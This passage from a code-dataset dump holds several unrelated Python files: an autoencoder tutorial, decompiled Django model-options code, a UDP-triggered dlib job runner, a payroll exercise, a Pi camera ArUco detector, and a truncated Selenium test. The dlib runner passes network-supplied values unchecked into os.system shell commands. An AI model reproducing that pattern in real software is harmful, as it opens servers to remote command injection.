batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('val_loss', loss)\n\n def test_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('test_loss', loss)\n\nclass GenerateCallback(pl.Callback):\n\n def __init__(self, input_imgs, every_n_epochs=1):\n super().__init__()\n self.input_imgs = input_imgs # Images to reconstruct during training\n self.every_n_epochs = every_n_epochs # Only save those images every N epochs (otherwise tensorboard gets quite large)\n\n def on_epoch_end(self, trainer, pl_module):\n if trainer.current_epoch % self.every_n_epochs == 0:\n # Reconstruct images\n input_imgs = 
self.input_imgs.to(pl_module.device)\n with torch.no_grad():\n pl_module.eval()\n reconst_imgs = pl_module(input_imgs)\n pl_module.train()\n # Plot and add to tensorboard\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=2, normalize=True, range=(-1,1))\n trainer.logger.experiment.add_image(\"Reconstructions\", grid, global_step=trainer.global_step)\n\ndef compare_imgs(img1, img2, title_prefix=\"\"):\n # Calculate MSE loss between both images\n loss = F.mse_loss(img1, img2, reduction=\"sum\")\n # Plot images for visual comparison\n grid = torchvision.utils.make_grid(torch.stack([img1, img2], dim=0), nrow=2, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(4,2))\n plt.title(\"%s Loss: %4.2f\" % (title_prefix, loss.item()))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef visualize_reconstructions(model, input_imgs):\n # Reconstruct images\n model.eval()\n with torch.no_grad():\n reconst_imgs = model(input_imgs.to(model.device))\n reconst_imgs = reconst_imgs.cpu()\n\n # Plotting\n imgs = torch.stack([input_imgs, reconst_imgs], dim=1).flatten(0,1)\n grid = torchvision.utils.make_grid(imgs, nrow=4, normalize=True, range=(-1,1))\n grid = grid.permute(1, 2, 0)\n plt.figure(figsize=(7,4.5))\n plt.title(\"Reconstructed from %i latents\" % (model.hparams.latent_dim))\n plt.imshow(grid)\n plt.axis('off')\n plt.show()\n \ndef train_cifar(latent_dim):\n # Create a PyTorch Lightning trainer with the generation callback\n trainer = pl.Trainer(default_root_dir=os.path.join(CHECKPOINT_PATH, \"cifar10_%i\" % latent_dim),\n gpus=1 if str(device).startswith(\"cuda\") else 0,\n max_epochs=500,\n callbacks=[ModelCheckpoint(save_weights_only=True),\n GenerateCallback(get_train_images(8), every_n_epochs=10),\n LearningRateMonitor(\"epoch\")])\n trainer.logger._log_graph = True # If True, we plot the computation graph in tensorboard\n trainer.logger._default_hp_metric = None # Optional logging argument that we don't need\n\n # Check whether pretrained model exists. If yes, load it and skip training\n pretrained_filename = os.path.join(CHECKPOINT_PATH, \"cifar10_%i.ckpt\" % latent_dim)\n if os.path.isfile(pretrained_filename):\n print(\"Found pretrained model, loading...\")\n model = Autoencoder.load_from_checkpoint(pretrained_filename)\n else:\n model = Autoencoder(base_channel_size=32, latent_dim=latent_dim)\n trainer.fit(model, train_loader, val_loader)\n # Test best model on validation and test set\n val_result = trainer.test(model, test_dataloaders=val_loader, verbose=False)\n test_result = trainer.test(model, test_dataloaders=test_loader, verbose=False)\n result = {\"test\": test_result, \"val\": val_result}\n return model, result\n\n# Path to the folder where the datasets are/should be downloaded (e.g. CIFAR10)\nDATASET_PATH = \"../data\"\n# Path to the folder where the pretrained models are saved\nCHECKPOINT_PATH = \"../saved_models/tutorial9\"\n\ndef get_train_images(num):\n return torch.stack([cifar10_dataset[i][0] for i in range(num)], dim=0)\n\n# Transformations applied on each image => only make them a tensor\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,),(0.5,))])\n\n# Loading the training dataset. 
We need to split it into a training and validation part\ntrain_dataset = CIFAR10(root=DATASET_PATH, train=True, transform=transform, download=True)\npl.seed_everything(42)\ntrain_set, val_set = torch.utils.data.random_split(train_dataset, [45000, 5000])\n\n# Loading the test set\ntest_set = CIFAR10(root=DATASET_PATH, train=False, transform=transform, download=True)\n\n# We define a set of data loaders that we can use for various purposes later.\ntrain_loader = data.DataLoader(train_set, batch_size=256, shuffle=True, drop_last=True, pin_memory=True, num_workers=4)\nval_loader = data.DataLoader(val_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\ntest_loader = data.DataLoader(test_set, batch_size=256, shuffle=False, drop_last=False, num_workers=4)\n\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(\"Device:\", device)\n\nfor i in range(2):\n    # Load example image\n    img, _ = train_dataset[i]\n    img_mean = img.mean(dim=[1,2], keepdims=True)\n\n    # Shift image by one pixel\n    SHIFT = 1\n    img_shifted = torch.roll(img, shifts=SHIFT, dims=1)\n    img_shifted = torch.roll(img_shifted, shifts=SHIFT, dims=2)\n    img_shifted[:,:1,:] = img_mean\n    img_shifted[:,:,:1] = img_mean\n    compare_imgs(img, img_shifted, \"Shifted -\")\n\n    # Set half of the image to zero\n    img_masked = img.clone()\n    img_masked[:,:img_masked.shape[1]//2,:] = img_mean\n    compare_imgs(img, img_masked, \"Masked -\")\n\nmodel_dict = {}\nfor latent_dim in [64, 128, 256, 384]:\n    model_ld, result_ld = train_cifar(latent_dim)\n    model_dict[latent_dim] = {\"model\": model_ld, \"result\": result_ld}\n\ninput_imgs = get_train_images(32)\nfor latent_dim in model_dict:\n    visualize_reconstructions(model_dict[latent_dim][\"model\"], input_imgs)\n","sub_path":"code/autoencoder_cifar.py","file_name":"autoencoder_cifar.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648947894","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-jkXn_D/django/django/db/models/options.py\n# Compiled at: 2018-07-11 18:15:30\nfrom __future__ import unicode_literals\nimport re\nfrom bisect import bisect\nfrom django.conf import settings\nfrom django.db.models.related import RelatedObject\nfrom django.db.models.fields.related import ManyToManyRel\nfrom django.db.models.fields import AutoField, FieldDoesNotExist\nfrom django.db.models.fields.proxy import OrderWrt\nfrom django.db.models.loading import get_models, app_cache_ready\nfrom django.utils import six\nfrom django.utils.datastructures import SortedDict\nfrom django.utils.encoding import force_text, smart_text, python_2_unicode_compatible\nfrom django.utils.translation import activate, deactivate_all, get_language, string_concat\nget_verbose_name = lambda class_name: re.sub(b'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', b' \\\\1', class_name).lower().strip()\nDEFAULT_NAMES = ('verbose_name', 'verbose_name_plural', 'db_table', 'ordering', 'unique_together',\n                 'permissions', 'get_latest_by', 'order_with_respect_to', 'app_label',\n                 'db_tablespace', 'abstract', 'managed', 'proxy', 'swappable', 'auto_created',\n                 
'index_together')\n\n@python_2_unicode_compatible\nclass Options(object):\n\n def __init__(self, meta, app_label=None):\n self.local_fields, self.local_many_to_many = [], []\n self.virtual_fields = []\n self.module_name, self.verbose_name = (None, None)\n self.verbose_name_plural = None\n self.db_table = b''\n self.ordering = []\n self.unique_together = []\n self.index_together = []\n self.permissions = []\n self.object_name, self.app_label = None, app_label\n self.get_latest_by = None\n self.order_with_respect_to = None\n self.db_tablespace = settings.DEFAULT_TABLESPACE\n self.admin = None\n self.meta = meta\n self.pk = None\n self.has_auto_field, self.auto_field = False, None\n self.abstract = False\n self.managed = True\n self.proxy = False\n self.proxy_for_model = None\n self.concrete_model = None\n self.swappable = None\n self.parents = SortedDict()\n self.duplicate_targets = {}\n self.auto_created = False\n self.abstract_managers = []\n self.concrete_managers = []\n self.related_fkey_lookups = []\n return\n\n def contribute_to_class(self, cls, name):\n from django.db import connection\n from django.db.backends.util import truncate_name\n cls._meta = self\n self.installed = re.sub(b'\\\\.models$', b'', cls.__module__) in settings.INSTALLED_APPS\n self.object_name = cls.__name__\n self.module_name = self.object_name.lower()\n self.verbose_name = get_verbose_name(self.object_name)\n if self.meta:\n meta_attrs = self.meta.__dict__.copy()\n for name in self.meta.__dict__:\n if name.startswith(b'_'):\n del meta_attrs[name]\n\n for attr_name in DEFAULT_NAMES:\n if attr_name in meta_attrs:\n setattr(self, attr_name, meta_attrs.pop(attr_name))\n elif hasattr(self.meta, attr_name):\n setattr(self, attr_name, getattr(self.meta, attr_name))\n\n ut = meta_attrs.pop(b'unique_together', self.unique_together)\n if ut and not isinstance(ut[0], (tuple, list)):\n ut = (\n ut,)\n self.unique_together = ut\n if self.verbose_name_plural is None:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n if meta_attrs != {}:\n raise TypeError(b\"'class Meta' got invalid attribute(s): %s\" % (b',').join(meta_attrs.keys()))\n else:\n self.verbose_name_plural = string_concat(self.verbose_name, b's')\n del self.meta\n if not self.db_table:\n self.db_table = b'%s_%s' % (self.app_label, self.module_name)\n self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())\n return\n\n def _prepare(self, model):\n if self.order_with_respect_to:\n self.order_with_respect_to = self.get_field(self.order_with_respect_to)\n self.ordering = ('_order', )\n model.add_to_class(b'_order', OrderWrt())\n else:\n self.order_with_respect_to = None\n if self.pk is None:\n if self.parents:\n field = next(six.itervalues(self.parents))\n already_created = [ fld for fld in self.local_fields if fld.name == field.name ]\n if already_created:\n field = already_created[0]\n field.primary_key = True\n self.setup_pk(field)\n else:\n auto = AutoField(verbose_name=b'ID', primary_key=True, auto_created=True)\n model.add_to_class(b'id', auto)\n collections = {}\n for column, target in six.iteritems(self.duplicate_targets):\n try:\n collections[target].add(column)\n except KeyError:\n collections[target] = set([column])\n\n self.duplicate_targets = {}\n for elt in six.itervalues(collections):\n if len(elt) == 1:\n continue\n for column in elt:\n self.duplicate_targets[column] = elt.difference(set([column]))\n\n return\n\n def add_field(self, field):\n if field.rel and isinstance(field.rel, ManyToManyRel):\n 
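# fields sort by creation_counter, so bisect() finds the slot that keeps the list in definition order\n            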
self.local_many_to_many.insert(bisect(self.local_many_to_many, field), field)\n            if hasattr(self, b'_m2m_cache'):\n                del self._m2m_cache\n        else:\n            self.local_fields.insert(bisect(self.local_fields, field), field)\n            self.setup_pk(field)\n            if hasattr(self, b'_field_cache'):\n                del self._field_cache\n                del self._field_name_cache\n        if hasattr(self, b'_name_map'):\n            del self._name_map\n\n    def add_virtual_field(self, field):\n        self.virtual_fields.append(field)\n\n    def setup_pk(self, field):\n        if not self.pk and field.primary_key:\n            self.pk = field\n            field.serialize = False\n\n    def pk_index(self):\n        \"\"\"\n        Returns the index of the primary key field in the self.fields list.\n        \"\"\"\n        return self.fields.index(self.pk)\n\n    def setup_proxy(self, target):\n        \"\"\"\n        Does the internal setup so that the current model is a proxy for\n        \"target\".\n        \"\"\"\n        self.pk = target._meta.pk\n        self.proxy_for_model = target\n        self.db_table = target._meta.db_table\n\n    def __repr__(self):\n        return b'<Options for %s>' % self.object_name\n\n    def __str__(self):\n        return b'%s.%s' % (smart_text(self.app_label), smart_text(self.module_name))\n\n    def verbose_name_raw(self):\n        \"\"\"\n        There are a few places where the untranslated verbose name is needed\n        (so that we get the same value regardless of currently active\n        locale).\n        \"\"\"\n        lang = get_language()\n        deactivate_all()\n        raw = force_text(self.verbose_name)\n        activate(lang)\n        return raw\n\n    verbose_name_raw = property(verbose_name_raw)\n\n    def _swapped(self):\n        \"\"\"\n        Has this model been swapped out for another? If so, return the model\n        name of the replacement; otherwise, return None.\n\n        For historical reasons, model name lookups using get_model() are\n        case insensitive, so we make sure we are case insensitive here.\n        \"\"\"\n        if self.swappable:\n            model_label = b'%s.%s' % (self.app_label, self.object_name.lower())\n            swapped_for = getattr(settings, self.swappable, None)\n            if swapped_for:\n                try:\n                    swapped_label, swapped_object = swapped_for.split(b'.')\n                except ValueError:\n                    return swapped_for\n\n                if b'%s.%s' % (swapped_label, swapped_object.lower()) not in (None, model_label):\n                    return swapped_for\n        return\n\n    swapped = property(_swapped)\n\n    def _fields(self):\n        \"\"\"\n        The getter for self.fields. This returns the list of field objects\n        available to this model (including through parent models).\n\n        Callers are not permitted to modify this list, since it's a reference\n        to this instance (not a copy).\n        \"\"\"\n        try:\n            self._field_name_cache\n        except AttributeError:\n            self._fill_fields_cache()\n\n        return self._field_name_cache\n\n    fields = property(_fields)\n\n    def get_fields_with_model(self):\n        \"\"\"\n        Returns a sequence of (field, model) pairs for all fields. The \"model\"\n        element is None for fields on the current model. 
Mostly of use when\n constructing queries so that we know which model a field belongs to.\n \"\"\"\n try:\n self._field_cache\n except AttributeError:\n self._fill_fields_cache()\n\n return self._field_cache\n\n def _fill_fields_cache(self):\n cache = []\n for parent in self.parents:\n for field, model in parent._meta.get_fields_with_model():\n if model:\n cache.append((field, model))\n else:\n cache.append((field, parent))\n\n cache.extend([ (f, None) for f in self.local_fields ])\n self._field_cache = tuple(cache)\n self._field_name_cache = [ x for x, _ in cache ]\n return\n\n def _many_to_many(self):\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(self._m2m_cache)\n\n many_to_many = property(_many_to_many)\n\n def get_m2m_with_model(self):\n \"\"\"\n The many-to-many version of get_fields_with_model().\n \"\"\"\n try:\n self._m2m_cache\n except AttributeError:\n self._fill_m2m_cache()\n\n return list(six.iteritems(self._m2m_cache))\n\n def _fill_m2m_cache(self):\n cache = SortedDict()\n for parent in self.parents:\n for field, model in parent._meta.get_m2m_with_model():\n if model:\n cache[field] = model\n else:\n cache[field] = parent\n\n for field in self.local_many_to_many:\n cache[field] = None\n\n self._m2m_cache = cache\n return\n\n def get_field(self, name, many_to_many=True):\n \"\"\"\n Returns the requested field by name. Raises FieldDoesNotExist on error.\n \"\"\"\n to_search = many_to_many and self.fields + self.many_to_many or self.fields\n for f in to_search:\n if f.name == name:\n return f\n\n raise FieldDoesNotExist(b'%s has no field named %r' % (self.object_name, name))\n\n def get_field_by_name(self, name):\n \"\"\"\n Returns the (field_object, model, direct, m2m), where field_object is\n the Field instance for the given name, model is the model containing\n this field (None for local fields), direct is True if the field exists\n on this model, and m2m is True for many-to-many relations. When\n 'direct' is False, 'field_object' is the corresponding RelatedObject\n for this field (since the field doesn't have an instance associated\n with it).\n\n Uses a cache internally, so after the first access, this is very fast.\n \"\"\"\n try:\n try:\n return self._name_map[name]\n except AttributeError:\n cache = self.init_name_map()\n return cache[name]\n\n except KeyError:\n raise FieldDoesNotExist(b'%s has no field named %r' % (\n self.object_name, name))\n\n def get_all_field_names(self):\n \"\"\"\n Returns a list of all field names that are possible for this model\n (including reverse relation names). 
This is used for pretty printing\n debugging output (a list of choices), so any internal-only field names\n are not included.\n \"\"\"\n try:\n cache = self._name_map\n except AttributeError:\n cache = self.init_name_map()\n\n names = sorted(cache.keys())\n return [ val for val in names if not val.endswith(b'+') ]\n\n def init_name_map(self):\n \"\"\"\n Initialises the field name -> field object mapping.\n \"\"\"\n cache = {}\n for f, model in self.get_all_related_m2m_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, True)\n\n for f, model in self.get_all_related_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, False)\n\n for f, model in self.get_m2m_with_model():\n cache[f.name] = (\n f, model, True, True)\n\n for f, model in self.get_fields_with_model():\n cache[f.name] = (\n f, model, True, False)\n\n if app_cache_ready():\n self._name_map = cache\n return cache\n\n def get_add_permission(self):\n return b'add_%s' % self.object_name.lower()\n\n def get_change_permission(self):\n return b'change_%s' % self.object_name.lower()\n\n def get_delete_permission(self):\n return b'delete_%s' % self.object_name.lower()\n\n def get_all_related_objects(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n return [ k for k, v in self.get_all_related_objects_with_model(local_only=local_only, include_hidden=include_hidden, include_proxy_eq=include_proxy_eq)\n ]\n\n def get_all_related_objects_with_model(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n \"\"\"\n Returns a list of (related-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n self._related_objects_cache\n except AttributeError:\n self._fill_related_objects_cache()\n\n predicates = []\n if local_only:\n predicates.append(lambda k, v: not v)\n if not include_hidden:\n predicates.append(lambda k, v: not k.field.rel.is_hidden())\n cache = self._related_objects_proxy_cache if include_proxy_eq else self._related_objects_cache\n return [ t for t in cache.items() if all(p(*t) for p in predicates) ]\n\n def _fill_related_objects_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_objects_with_model(include_hidden=True):\n if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n proxy_cache = cache.copy()\n for klass in get_models(include_auto_created=True, only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_fields:\n if f.rel and not isinstance(f.rel.to, six.string_types):\n if self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n elif self.concrete_model == f.rel.to._meta.concrete_model:\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n\n self._related_objects_cache = cache\n self._related_objects_proxy_cache = proxy_cache\n return\n\n def get_all_related_many_to_many_objects(self, local_only=False):\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n if local_only:\n return [ k for k, v in cache.items() if not v ]\n return list(cache)\n\n def get_all_related_m2m_objects_with_model(self):\n \"\"\"\n Returns a list of (related-m2m-object, model) pairs. 
Similar to\n get_fields_with_model().\n \"\"\"\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n return list(six.iteritems(cache))\n\n def _fill_related_many_to_many_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_m2m_objects_with_model():\n if obj.field.creation_counter < 0 and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n for klass in get_models(only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_many_to_many:\n if f.rel and not isinstance(f.rel.to, six.string_types) and self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n\n if app_cache_ready():\n self._related_many_to_many_cache = cache\n return cache\n\n def get_base_chain(self, model):\n \"\"\"\n Returns a list of parent classes leading to 'model' (order from closest\n to most distant ancestor). This has to handle the case where 'model' is\n a grandparent or even more distant relation.\n \"\"\"\n if not self.parents:\n return\n if model in self.parents:\n return [model]\n for parent in self.parents:\n res = parent._meta.get_base_chain(model)\n if res:\n res.insert(0, parent)\n return res\n\n raise TypeError(b'%r is not an ancestor of this model' % model._meta.module_name)\n\n def get_parent_list(self):\n \"\"\"\n Returns a set of all the ancestors of this model. Useful for\n determining if something is an ancestor, regardless of lineage.\n \"\"\"\n result = set()\n for parent in self.parents:\n result.add(parent)\n result.update(parent._meta.get_parent_list())\n\n return result\n\n def get_ancestor_link(self, ancestor):\n \"\"\"\n Returns the field on the current model which points to the given\n \"ancestor\". This is possibly an indirect link (a pointer to a parent\n model, which points, eventually, to the ancestor). 
Used when\n constructing table joins for model inheritance.\n\n Returns None if the model isn't an ancestor of this one.\n \"\"\"\n if ancestor in self.parents:\n return self.parents[ancestor]\n for parent in self.parents:\n parent_link = parent._meta.get_ancestor_link(ancestor)\n if parent_link:\n return self.parents[parent] or parent_link\n\n def get_ordered_objects(self):\n \"\"\"Returns a list of Options objects that are ordered with respect to this object.\"\"\"\n if not hasattr(self, b'_ordered_objects'):\n objects = []\n self._ordered_objects = objects\n return self._ordered_objects","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":19606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100840928","text":"import os\nimport sys\nimport socket\nfrom config import *\n\nserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserverSock.bind((\"csml-dlib\", apps[\"dlib\"]))\n\ndef main():\n # (simplest) CMD_LINE Format\n # app:container_id:simple_request\n while True:\n\n CMD_LINE, SOURCE_ADDR = serverSock.recvfrom(1024)\n CMD_LINE = CMD_LINE.decode('utf-8')\n container_id = CMD_LINE.split(\":\")[1] # type:str\n simple_request = CMD_LINE.split(\":\")[2] # type:str 'Y' or 'N'\n\n # Ready to process, change the status to [pending]\n # If first use, ignore the error anyway, no harm\n EXE_LINE = \"mv /results/opencv/\" + str(container_id) + \".log /results/dlib/[pending]\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\n if simple_request == 'Y':\n EXE_LINE = \"/dlib-19.18/examples/build/svm_ex\"\n EXE_LINE += \" | ts '[%Y-%m-%d %H:%M:%S]'\"\n EXE_LINE += \" | tee -a /results/dlib/[pending]\" # -a for appending\n EXE_LINE += str(container_id) + \".log\" # One user one .log file\n os.system(EXE_LINE)\n\n # Remove the [pending] status\n EXE_LINE = \"mv /results/dlib/[pending]\" + str(container_id) + \".log /results/dlib/\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/app/dlib_app.py","file_name":"dlib_app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"488705537","text":"# Classes ==================================================================\n \nclass Programmer:\n \n # Add the class attributes\n salary = 30000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, programming_languages):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.programming_languages = programming_languages\n \nclass Assistant:\n \n # Add the class attributes\n salary = 20000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, bilingual):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.bilingual = bilingual\n \n# Program ==================================================================\n \n# Function that prints the monthly salary of each worker\n# and the total amount that the startup owner has to pay per month\ndef calculate_payroll(employees):\n \n total = 0\n \n print(\"\\n========= Welcome to our Payroll System =========\\n\")\n \n # Iterate over the list of instances to calculate\n # and display the monthly salary of each employee,\n # and add the monthly salary to the total for this month\n for employee in employees:\n salary = round(employee.salary / 12, 2) + 
employee.monthly_bonus\n print(employee.name.capitalize() + \"'s salary is: $\" + str(salary))\n total += salary\n \n # Display the total \n print(\"\\nThe total payroll this month will be: $\", total)\n \n# Instances (employees)\njack = Programmer(\"Jack\", 45, \"5th Avenue\", \"555-563-345\", [\"Python\", \"Java\"])\nisabel = Programmer(\"Isabel\", 25, \"6th Avenue\", \"234-245-853\", [\"JavaScript\"])\nnora = Assistant(\"Nora\", 23, \"7th Avenue\", \"562-577-333\", True)\n \n# List of instances\nemployees = [jack, isabel, nora]\n \n# Function call - Passing the list of instances as argument\ncalculate_payroll(employees)\n","sub_path":"payroll (mini project)/payroll.py","file_name":"payroll.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"426019411","text":"'''\n* Team ID : 117\n* Author List : Ebey Abraham, Akshatha Nayak, Anandhu Udayakumar\n* Filename : picam.py\n* Theme : Antbot\n* Functions : detectAruco(img), markAruco(img,aruco_list), getArucoID(), getArucoBits()\n* Global Variables : NONE\n'''\nfrom imutils.video.videostream import VideoStream\nimport imutils\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport time\nimport csv\nimport pandas as pd\nimport numpy as np\n\nclass Camera:\n def __init__(self):\n self.IDs = []\n #range for red color\n self.lower_red = np.array([160,100,0])\n self.upper_red = np.array([180,255,255])\n #range for blue color\n self.lower_blue = np.array([100,100,0])\n self.upper_blue = np.array([140,255,255])\n #range for green color\n self.lower_green = np.array([40,100,0])\n self.upper_green = np.array([80,255,255])\n #range for yellow color\n self.lower_yellow = np.array([10,100,100])\n self.upper_yellow = np.array([30,255,255])\n\n '''\n * Function Name : detectAruco\n * Input : img-> image to detect aruco marker from\n * Output : returns the detected aruco id and its corner as a dictionary\n * Logic : check that the image frame has only one aruco marker and return the id and corner list as a key value pair\n * Example Call : detectAruco(img)\n '''\n def detectAruco(self,img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #create aruco dictionary of 7x7 bits and 1000 combinations\n aruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_1000)\n parameters = aruco.DetectorParameters_create()\n #list of corners and ids\n corners, ids, _ = aruco.detectMarkers(gray,aruco_dict,parameters = parameters)\n aruco_list = {} #stores pairs of aruco id and corresponding corners\n #check that only one aruco marker is there and return the aruco id\n if len(corners) == 1:\n aruco_list[ids[0][0]] = corners[0][0]\n return aruco_list\n\n '''\n * Function Name : markAruco\n * Input : img-> image to detect aruco marker from\n aruco_list -> dictionary of aruco corners indexed by the aruco ID\n * Output : returns the image with the marked corners\n * Logic : find the center of the aruco marker by finding the mean and mark the center and the corners\n * Example Call : markAruco(img,aruco_list)\n '''\n def markAruco(self,img,aruco_list):\n ids = aruco_list.keys()\n font = cv2.FONT_HERSHEY_SIMPLEX\n for id in ids:\n corners = aruco_list[id]\n center = corners[0] + corners[1] + corners[2] + corners[3]\n center[:] = [int(x/4) for x in center]\n center = tuple(center)\n #marking the points\n cv2.circle(img,center,1,(0,0,255),8)\n cv2.circle(img,tuple(corners[0]),1,(0,0,255),8)\n cv2.circle(img,tuple(corners[1]),1,(0,255,0),8)\n 
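# Added note (assumption about the OpenCV API): cv2.aruco.detectMarkers returns\n # each marker's four corners clockwise starting from the top-left, so the\n # circles drawn here mark the top-left, top-right and bottom-right corners.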
cv2.circle(img,tuple(corners[2]),1,(255,0,0),8)\n return img\n\n '''\n * Function Name : getArucoID\n * Input : NONE\n * Output : returns the detected aruco ID\n * Logic : loop the camera feed till a aruco marker id detected by detectAruco\n * Example Call : getArucoID()\n '''\n def getArucoID(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n ids = []\n while len(ids) < 4:\n ID = 0 #stores the detected ID\n frame = vs.read()\n aruco_list = self.detectAruco(frame)\n if len(aruco_list):\n foundID = True\n ID = list(aruco_list.keys())\n ID = ID[0]\n #check that the detected ID is not repeated and add to the list of ids\n if ID > 0 and ID not in ids:\n ids.append(ID)\n #self.IDs.append(bin(ID)[2:]) #store ID in binary format\n print(\"ID Detected: {}\".format(ID))\n vs.stop()\n\n def getColor(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n count = 3\n colors = {'r':0,'b':0,'g':0,'y':0}\n while count:\n count -= 1\n frame = vs.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n mask_red = cv2.inRange(hsv,self.lower_red,self.upper_red)\n mask_blue = cv2.inRange(hsv,self.lower_blue,self.upper_blue)\n mask_green = cv2.inRange(hsv,self.lower_green,self.upper_green)\n mask_yellow = cv2.inRange(hsv,self.lower_yellow,self.upper_yellow)\n\n colors['r'] = cv2.countNonZero(mask_red)\n colors['b'] = cv2.countNonZero(mask_blue)\n colors['g'] = cv2.countNonZero(mask_green)\n colors['y'] = cv2.countNonZero(mask_yellow)\n\n #res = cv2.bitwise_and(frame,frame,mask = mask_yellow)\n #cv2.imshow(\"Res\",res)\n #cv2.waitKey(10)\n vs.stop()\n print(colors)\n for color in colors:\n if colors[color] > 5000:\n return color\n return 'x'\n\n\nif __name__ == \"__main__\":\n cam = Camera()\n res = cam.getColor()\n print(res)\n","sub_path":"utils/picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181941212","text":"import time\n\nfrom django.test import TestCase, override_settings\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .utils import element_has_css_class\n\nimport os\nos.environ['WDM_LOG_LEVEL'] = '0'\n\nclass TestBatonIndex(TestCase):\n def setUp(self):\n service = Service(ChromeDriverManager(version='114.0.5735.90').install())\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-dev-shm-usage')\n self.driver = webdriver.Chrome(\n service=service,\n options=chrome_options,\n )\n self.driver.set_window_size(1920, 1080)\n self.driver.implicitly_wait(10)\n self.login()\n\n def tearDown(self):\n self.driver.quit()\n\n def login(self):\n self.driver.get('http://localhost:8000/admin')\n username_field = self.driver.find_element(By.ID, \"id_username\")\n password_field = self.driver.find_element(By.ID, \"id_password\")\n button = self.driver.find_element(By.CSS_SELECTOR, 'input[type=submit]')\n\n username_field.send_keys('admin')\n time.sleep(1)\n password_field.send_keys('admin')\n time.sleep(1)\n button.click()\n\n def test_force_theme(self):\n # Wait until baton is 
